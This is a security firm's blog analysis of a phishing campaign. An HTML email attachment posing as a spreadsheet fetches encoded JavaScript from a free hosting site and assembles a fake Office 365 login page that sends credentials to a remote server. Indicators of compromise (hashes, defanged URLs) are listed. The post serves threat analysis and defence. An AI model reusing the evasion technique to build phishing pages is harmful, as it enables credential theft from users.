CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

HTML Lego: Hidden Phishing at Free JavaScript Site

This blog investigates an interesting phishing campaign we encountered recently. In this campaign, the email subject pertains to a price revision followed by numbers. There is no email body but there is an attachment about an ”investment”. The convoluted filename of the attachment contains characters that are not allowed in the naming convention of a file, noticeably the vertical. Although, as you can see below, while "xlsx" is in the filename, double-clicking the attachment will prompt to open the attachment with the default web browser. Thus, the file indeed appears to be an HTML document.

FIG1Figure 1. Attachment of the email has two extensions, an Excel? No, it’s HTML.

Before diving into more details about the HTML file attachment, below is an overview diagram of how the phishing routine was carried out.

FIG2

Figure 2. How phishing was executed

 

We first checked out the HTML file attachment with a text editor to view the contents. It is noticeable that a chunk of text is URL Encoded. We turned to a favorite tool, CyberChef, and used its URL Decode function. It revealed more encoded text, some HTML Entity code.

Pulling out the HTML Entity code and decoding using CyberChef’s HTML Entity function reveals two URLs pointing at the website, yourjavascript.com, which is interesting as we had already seen this being used before in phishing, and now it is being utilized once again in this campaign. This time around, the site hosts not one, but two JavaScript files.

FIG3

Figure 3. From URL Encoded yields HTML Entity Encoded, finally reveals two JavaScript files hosted at a remote website

 

With a web browser, we visited the first hosted JavaScript file, 343454545.js in yourjavascript.com and saved a copy of the script file in case it was taken down during analysis.  This hosted JavaScript file consists of two blocks of URL encoded text.

CyberChef’s URL Decode function reveals the hidden HTML code. The first block of URL encoded text is Part 1 of the HTML Code, where the beginning HTML tag is located. The second block of URL encoded text is Part 2 of the HTML Code which contains an HTML JavaScript code that validates email and password input of the victim.

FIG4

Figure 4. JS Script containing URL Encoded texts unveils Part 1 and Part 2 of the HTML code

 

With a web browser again, we visited the second hosted JavaScript file, 8898989-8787.js at yourjavascript.com and again saved it. This time, the hosted JavaScript consists of two blocks of Base64 encoded text.

Again, CyberChef’s Base64 Decode function reveals the hidden HTML code. The first block of Base64 Encoded text is Part 3 of the HTML code, this is the body part of the html code. Notably, it has the form URL where the submit function is located via the  <form> tags. The second block of Base64 encoded text is Part 4 of the HTML Code which is HTML JavaScript code that triggers a popup message box.

FIG5

Figure 5. JS Script containing Base64 texts unveils Part 3 and Part 4 of the HTML code

 

By now we had decoded a bunch of encoded texts which are now mostly readable. In a nutshell, to better understand how it all happened in the background, check the table representation below.

FIG6

Figure 6. The HTML Lego, stack ‘em up, you’ll see the big picture: Phishing Page

 

We copied over 367 lines of decoded HTML code in order, combined all five parts into a text file editor, and saved the file as test.htm. Remember the last part of the HTML code at the bottom of the original email attachment we mentioned a while ago? We added that as the last part of the HTM file.

In that final part of the code, we inserted a dummy Base64 Encoded email address (“mydummyemailaddress@nonexistent.com”) to replace one line where the original recipient’s Base64 encoded email address had been.

FIG7

Figure 7. Setting out the bait email address

 

We then opened test.htm in a web browser. It pops up a message box notification suggesting the user has been logged out of their account and needs to log in once more. This phishing campaign is aimed at Microsoft Office365 users as the web UI is designed to mimic a login interface of Microsoft, complete with logo. There is also a blurred image of an invoice of some company in the background so that in order to see it properly, victims are lured to key in their password.

FIG8

Figure 8. This phishing page is targeting Office 365 users.

 

The email address is automatically populated since we manipulated one into the code. But we also opted to key in an invalid email address. The phishing page has a Regular Expression validator for email addresses. Password keys are hidden masked characters. We keyed in a dummy password – “mydummypassword” in the password field. There is also a validator in this field for a blank password.

FIG10

Figure 9. Phishing page validates email address format and password length.

 

After hitting the "Next" button on the phishing page, we were able to capture the HTTP POST request to the form URL. It sends the stolen information: email address, on the user field and password on the pass field. As of this writing, the said URL is still online, probably harvesting credentials from its victims. The form URL has a 302 HTTP response which means redirection to another webpage location. The redirection page is now blocked as a phishing website.

FIG10Figure 10. Captured HTTP POST Request and Webpage Redirection

 

To wrap up, this phishing campaign design was a little more tricky than usual. By improvising an HTML email attachment that incorporates remote JavaScript code located on a free JavaScript hosting site, and ensuring the code is encoded uniquely, the attackers seek to fly under the radar to avoid detection.

 

IOCs

Files:

FileName:           hercus-Investment 547183-xlsx.H t m l
MD5:                     fd0338283eebe564e6d6dd4f62f5121b
SHA1:                    1d973f88469871cb643c8788945ad9425291d8b0

FileName:           343454545.js
MD5:                     96f8266ae8c07105e6ab3de10b74a959
SHA1:                    9b121f2ec8f7773ef91691db85ab28618d8c73b7

FileName:           8898989-8787.js
MD5:                     ee14a634b41cd67a924eb31c1098a75b
SHA1:                    466424e133d9f86355d8330da6e55a48d6e77d2d

URLs:

  • hxxp://yourjavascript[.]com/1129720361/343454545[.]js
  • hxxp://yourjavascript[.]com/4231652881/8898989-8787[.]js
  • hxxp://tokai-lm[.]jp//shop_pic/656687-98989/43390[.]php?089766543-86564
  • hxxp://madassociates[.]asia/css/wrng[.]html

Latest SpiderLabs Blogs

CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway

Overview A command injection vulnerability has been discovered in the GlobalProtect feature within Palo Alto Networks PAN-OS software for specific versions that have distinct feature configurations...

Read More

CNAPP, CSPM, CIEM, CWPP – Oh My!

We all know the cybersecurity industry loves its acronyms, but just because this fact is widely known doesn’t mean everyone knows the story behind the alphabet soup groups of letters, we must deal...

Read More

Phishing Deception - Suspended Domains Reveal Malicious Payload for Latin American Region

Recently, we observed a phishing campaign targeting the Latin American region. The phishing email contained a ZIP file attachment that when extracted reveals an HTML file that leads to a malicious...

Read More